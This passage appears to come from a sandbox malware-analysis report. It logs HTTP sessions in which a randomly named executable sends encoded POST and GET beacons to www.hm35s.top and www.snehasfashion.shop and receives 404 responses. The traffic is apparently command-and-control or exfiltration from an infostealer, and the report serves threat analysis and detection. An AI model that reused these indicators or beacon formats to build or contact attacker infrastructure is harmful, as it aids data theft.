                                                                            11192.168.2.1049915154.23.184.95804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:40.101125956 CET1710OUTPOST /lazq/ HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.hm35s.top
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.hm35s.top/lazq/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 62 76 38 76 56 2f 67 56 41 6c 7a 78 6e 4a 65 6e 34 42 5a 70 7a 72 34 61 41 6f 63 34 48 51 52 52 49 67 65 63 4b 67 79 6b 48 59 71 33 6a 48 50 4b 56 2f 69 57 6e 6b 39 75 4e 36 59 56 50 68 78 54 46 46 39 48 37 2b 47 6b 64 43 75 77 72 5a 39 78 35 34 55 59 51 7a 4c 4f 55 30 58 2b 31 49 69 51 49 6a 51 54 49 62 35 46 4e 6d 4d 43 2f 72 41 52 5a 34 72 34 45 52 66 53 54 74 5a 33 79 70 71 47 6e 48 59 38 4e 50 4e 59 32 45 47 52 46 79 61 46 6f 71 39 57 4c 53 70 45 38 73 4b 43 64 7a 6d 4b 48 55 69 76 46 66 49 62 78 70 68 45 49 74 4a 66 71 59 4b 34 2f 31 65 45 31 55 36 6c 39 76 4b 38 33 56 71 39 79 6b 6a 66 76 30 38 35 52 54 37 4b 46 49 71 4e 71 54 38 66 56 6a 43 4c 42 55 58 67 41 71 34 77 78 44 32 63 43 64 77 55 47 77 2b 4a 5a 75 4a 65 76 6f 35 51 78 7a 54 6a 62 41 79 48 4f 48 75 35 77 76 68 6e 37 53 70 77 45 73 34 42 50 2f 2b 74 71 58 2f 71 2b 42 55 58 6e 49 77 6f 75 4c 37 78 36 33 74 30 63 31 78 47 50 70 36 79 39 2b 4d 43 4b 6c 70 6f 64 36 77 48 53 66 6e 71 4a 61 70 72 67 51 6a 43 34 72 [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=bv8vV/gVAlzxnJen4BZpzr4aAoc4HQRRIgecKgykHYq3jHPKV/iWnk9uN6YVPhxTFF9H7+GkdCuwrZ9x54UYQzLOU0X+1IiQIjQTIb5FNmMC/rARZ4r4ERfSTtZ3ypqGnHY8NPNY2EGRFyaFoq9WLSpE8sKCdzmKHUivFfIbxphEItJfqYK4/1eE1U6l9vK83Vq9ykjfv085RT7KFIqNqT8fVjCLBUXgAq4wxD2cCdwUGw+JZuJevo5QxzTjbAyHOHu5wvhn7SpwEs4BP/+tqX/q+BUXnIwouL7x63t0c1xGPp6y9+MCKlpod6wHSfnqJaprgQjC4r6RVgdZ4Zb01QzE2b4ZZrcYtHlKovYQdMYj/YtEMsmPqwRZpLB1sHPpYNUJ5OgUY9IbV0gpnIHWxudlGVODRxqBh2DxCHgr6Wrm5u/z61900aZsM1YQ3y6xn+cWCR7nfH3vcUshmYG+9qRsXam0yv6swYwiMH7Ev9+yge4DgPnAHcmDkbqIVHoNgOCvB5nA4qbHCu0FE/1VtycNG6Y7PjoH24fsvfBg8/VvWRcc/ngQkd1APiwZwIfPRL1yUa/+izU2VPXEQUBXqIf/FncudTXjSRVoOCOqu+dUqF8V6v7bd0CWajE0iYBuvVG5zdhTV0tpwsKyfzWq8Grjqv3AaULomQl2mPxLKBsgIBBIz0XUmAT//DyGh/ujkwoiGIlXo1uwi/q9Ah455z+f9UCyZgtlyuilFc2iQ+XgKLRNOzKZjLEsqSAtg8ssQySlrm16G43QWce5/Jx9oSFKOTCkVBErYrRihAbPQAKCoxXtHX3xi3m0sJih+RvMng8Az92tim202r8MKdM1U67sy9DcUu1JVHgK46GbdFxjTm3M2gZw3Y5EOJSQm+d+9X1xvlB4UHlH8bdcWcdaCwjo8pOsLOtGLiesAlLIITgpkEglh/4nOIzfw2Rnn8uHHZNVlZo7OVdcHCHzUR4e04nnO23b9m3GGWGbTPyM03oH [TRUNCATED]
                                                                            Nov 24, 2024 08:22:41.697002888 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.1049923154.23.184.95804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:42.762362957 CET419OUTGET /lazq/?GX6Lp2F=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVSnofUD39ICOc0FIB5gcPzcC3Y1kKg==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.hm35s.top
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:44.325042009 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sun, 24 Nov 2024 07:22:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66a5f968-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.104993988.198.8.150804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:50.128062010 CET700OUTPOST /2lci/ HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.snehasfashion.shop
                                                                            Content-Length: 196
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.snehasfashion.shop/2lci/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 45 2b 58 70 64 7a 47 61 32 33 34 67 59 7a 5a 4c 66 67 44 4f 6f 4b 48 65 56 77 4c 6f 36 65 6c 63 50 66 77 53 42 70 66 53 70 66 55 73 54 59 72 72 56 4c 4e 69 64 33 76 2f 67 61 49 70 4d 56 48 42 2f 33 4b 6d 47 6c 6f 46 79 2b 44 58 38 2b 71 2b 74 35 35 56 58 73 38 4e 67 57 4e 56 73 5a 48 78 45 53 4c 35 72 4c 7a 53 63 75 41 66 2b 51 2b 4c 78 6a 6c 4e 2b 50 65 79 50 68 76 2f 70 47 6b 4b 68 71 79 33 77 65 49 4a 61 6e 37 33 57 73 43 6a 67 32 68 47 4f 51 47 53 46 67 45 56 55 49 6b 42 67 72 44 37 75 7a 58 6c 36 43 55 79 7a 74 53
                                                                            Data Ascii: GX6Lp2F=oUpW0YhmY+UamE+XpdzGa234gYzZLfgDOoKHeVwLo6elcPfwSBpfSpfUsTYrrVLNid3v/gaIpMVHB/3KmGloFy+DX8+q+t55VXs8NgWNVsZHxESL5rLzScuAf+Q+LxjlN+PeyPhv/pGkKhqy3weIJan73WsCjg2hGOQGSFgEVUIkBgrD7uzXl6CUyztS
                                                                            Nov 24, 2024 08:22:51.531012058 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 1992
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Sun, 24 Nov 2024 07:22:51 GMT
                                                                            Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                            Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                            Nov 24, 2024 08:22:51.531039000 CET1005INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                            Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhFaWIK\>R4


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.104994588.198.8.150804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:52.798949003 CET724OUTPOST /2lci/ HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.snehasfashion.shop
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.snehasfashion.shop/2lci/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 6b 4f 58 6c 61 48 47 53 32 33 33 75 34 7a 5a 51 76 67 48 4f 6f 57 48 65 55 46 4f 6f 4a 71 6c 46 75 76 77 54 46 64 66 52 70 66 55 30 6a 59 79 7a 31 4c 53 69 64 79 46 2f 69 4f 49 70 4d 42 48 42 39 76 4b 6d 56 39 72 45 69 2b 46 4f 73 2b 6f 36 74 35 35 56 58 73 38 4e 67 43 33 56 73 42 48 78 30 43 4c 6f 36 4c 79 4f 4d 75 44 4a 75 51 2b 42 52 69 4e 4e 2b 50 77 79 4f 74 46 2f 71 2b 6b 4b 69 2b 79 35 43 6d 4c 53 4b 6e 78 71 47 73 4a 74 54 54 75 44 66 34 49 58 6b 4d 33 49 6b 55 68 47 42 57 45 71 2f 53 41 32 4e 65 61 38 31 59 34 6b 51 47 70 69 34 66 57 69 32 39 30 69 44 2f 5a 77 68 47 44 46 41 3d 3d
                                                                            Data Ascii: GX6Lp2F=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoJqlFuvwTFdfRpfU0jYyz1LSidyF/iOIpMBHB9vKmV9rEi+FOs+o6t55VXs8NgC3VsBHx0CLo6LyOMuDJuQ+BRiNN+PwyOtF/q+kKi+y5CmLSKnxqGsJtTTuDf4IXkM3IkUhGBWEq/SA2Nea81Y4kQGpi4fWi290iD/ZwhGDFA==
                                                                            Nov 24, 2024 08:22:54.225421906 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 1992
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Sun, 24 Nov 2024 07:22:53 GMT
                                                                            Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                            Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                            Nov 24, 2024 08:22:54.225461960 CET1005INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                            Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhFaWIK\>R4


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.104995288.198.8.150804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:55.458304882 CET1737OUTPOST /2lci/ HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Origin: http://www.snehasfashion.shop
                                                                            Content-Length: 1232
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Referer: http://www.snehasfashion.shop/2lci/
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Data Raw: 47 58 36 4c 70 32 46 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 6b 4f 58 6c 61 48 47 53 32 33 33 75 34 7a 5a 51 76 67 48 4f 6f 57 48 65 55 46 4f 6f 49 53 6c 46 34 54 77 53 6b 64 66 51 70 66 55 71 54 59 33 7a 31 4c 66 69 64 4b 42 2f 69 43 79 70 4b 46 48 42 65 6e 4b 78 55 39 72 4b 69 2b 46 54 38 2b 70 2b 74 35 67 56 58 39 31 4e 67 53 33 56 73 42 48 78 79 2b 4c 34 62 4c 79 64 38 75 41 66 2b 51 49 4c 78 69 32 4e 2f 72 47 79 4f 70 2f 34 61 65 6b 4b 43 75 79 31 52 65 4c 50 61 6e 33 70 47 74 4a 74 54 75 75 44 66 6b 54 58 6b 49 4e 49 6d 45 68 45 6e 2f 35 37 38 7a 59 6e 65 37 44 30 6a 34 64 6e 58 53 30 69 35 43 2f 31 48 70 30 36 58 53 5a 2f 7a 54 55 48 44 77 6d 6c 57 55 78 69 76 58 74 71 35 62 52 71 64 55 57 2b 42 6b 51 49 30 73 7a 4c 78 2b 6c 69 4e 39 6f 4f 34 61 46 51 55 61 6f 50 77 32 6b 36 38 36 76 45 52 45 31 45 5a 64 73 71 43 56 59 77 49 55 53 58 34 4d 30 47 66 62 6f 55 49 54 56 58 43 59 57 47 39 50 50 57 4f 4f 38 43 32 54 32 71 36 72 62 35 50 57 50 35 31 4d 46 46 2f 7a 52 64 62 4a 72 66 42 68 52 4d 31 [TRUNCATED]
                                                                            Data Ascii: GX6Lp2F=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoISlF4TwSkdfQpfUqTY3z1LfidKB/iCypKFHBenKxU9rKi+FT8+p+t5gVX91NgS3VsBHxy+L4bLyd8uAf+QILxi2N/rGyOp/4aekKCuy1ReLPan3pGtJtTuuDfkTXkINImEhEn/578zYne7D0j4dnXS0i5C/1Hp06XSZ/zTUHDwmlWUxivXtq5bRqdUW+BkQI0szLx+liN9oO4aFQUaoPw2k686vERE1EZdsqCVYwIUSX4M0GfboUITVXCYWG9PPWOO8C2T2q6rb5PWP51MFF/zRdbJrfBhRM1gDcsfNy2AoH7sp80UAXmDFChySff0n2fw2zhJyZ7Rrwsdg4o+ydClwasZ8AtCKukHVdIzK0HbEagrS0GVjihoMlL3br5RNktN+vfPto4XQIK+S9WO2haBbNyaFf2ZULgfOBr1FdYqyC23jQo/jT02K8J7U9JRyUCR+xLCgZOQhh8BWCps6BxeHGEfZzXmMRcwkxTTNYTqxFjeKfN1+wGFQ1kFBXwy2rUhtlT+VqhfuSgdZdOcZD18e5jB3OJ3Gh257w7ET5CvkFORLf8WWA3mbl4AqttAiO82B27V5go9CN6uylls2viDJDApuhyH00DO9jXnQX19RGGPInhpuuDHJg5lXntxwfzJ29CT0KQFFnuKQA0WobIVt6jja6HLVIImMRWu3IU8yWiMp6vLRR4f3f7f3/e9VFuNdarzPnR5YH+lcnLNvFXPiu1QJUwzWwZLf3KuSZ7vdgnZFpVKs9Tvo3oSzCJ/L3p8EyjRA3SACP+RpGK4sMZU6IL0liSfxqlSW8yhe18jyExBrCGnyIq2SJEg0ljw9jxiUB170hoJfwnemwBTUclt3konei5TBe+0zWA2h+YuskvHFFQNFj592hUuew5W1GdNSWVoR7wWv/T1JW6aiASFX/MtzxmbE2BahzVsFgOEiB1Yo3KrTfgd++dd+Pkk6X7gO [TRUNCATED]
                                                                            Nov 24, 2024 08:22:56.965395927 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 1992
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Sun, 24 Nov 2024 07:22:56 GMT
                                                                            Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                            Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                            Nov 24, 2024 08:22:56.965426922 CET1005INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                            Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhFaWIK\>R4


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.104995988.198.8.150804764C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 24, 2024 08:22:58.126352072 CET428OUTGET /2lci/?GX6Lp2F=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNFSbRcaQ2LBAWGtnFx6vVohs8RPjrA==&H8=BpFD-28hKhrD HTTP/1.1
                                                                            Host: www.snehasfashion.shop
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                            Nov 24, 2024 08:22:59.499217033 CET1236INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/8.1.29
                                                                            cache-control: no-cache, private
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 6603
                                                                            date: Sun, 24 Nov 2024 07:22:59 GMT
